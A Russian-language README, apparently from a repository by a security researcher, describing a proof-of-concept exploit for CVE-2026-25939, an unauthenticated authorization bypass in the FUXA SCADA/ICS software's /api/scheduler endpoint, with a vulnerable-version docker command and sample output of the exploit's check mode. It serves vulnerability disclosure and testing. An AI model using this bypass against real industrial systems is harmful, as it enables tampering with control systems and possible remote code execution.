
Эксплойт-доказательство концепции для CVE-2026-25939 — неаутентифицированный обход авторизации в ПО SCADA FUXA, позволяющий произвольное манипулирование планировщиком и потенциальное удалённое выполнение кода (RCE).
Mohammed Idrees Banyamer Исследователь в области безопасности
Этот репозиторий содержит эксплойт Proof-of-Concept (PoC) для CVE-2026-25939 — критической уязвимости обхода авторизации в FUXA (программное обеспечение SCADA/ICS с открытым исходным кодом). Уязвимость позволяет неаутентифицированным удалённым злоумышленникам создавать, изменять и удалять произвольные записи планировщика, что потенциально может привести к удалённому выполнению кода и манипулированию системами промышленного управления.
Уязвимость существует в конечной точке /api/scheduler, где проверки аутентификации гостевого пользователя отсутствовали как в обработчиках POST, так и DELETE. Патч в версии v1.2.11 добавил явную проверку .
authJwt.isGuestUser()POST /api/scheduler — создание/изменение планировщиковDELETE /api/scheduler — удаление планировщиковПример 1: Оценка уязвимости
docker run -p 1881:1881 -d fuxa:v1.2.10
$ python CVE-2026-25939.py http://192.168.1.100:1881 --check
[*] Проверка статуса уязвимости для http://192.168.1.100:1881
[*] Тестирование гостевого доступа к API планировщика...
[*] Статус ответа GET: 200
[*] Тестирование создания планировщика...
[*] Статус ответа POST: 200
[!] УЯЗВИМ: Цель принимает создание планировщика без аутентификации
[!] Это указывает на версию < 1.2.11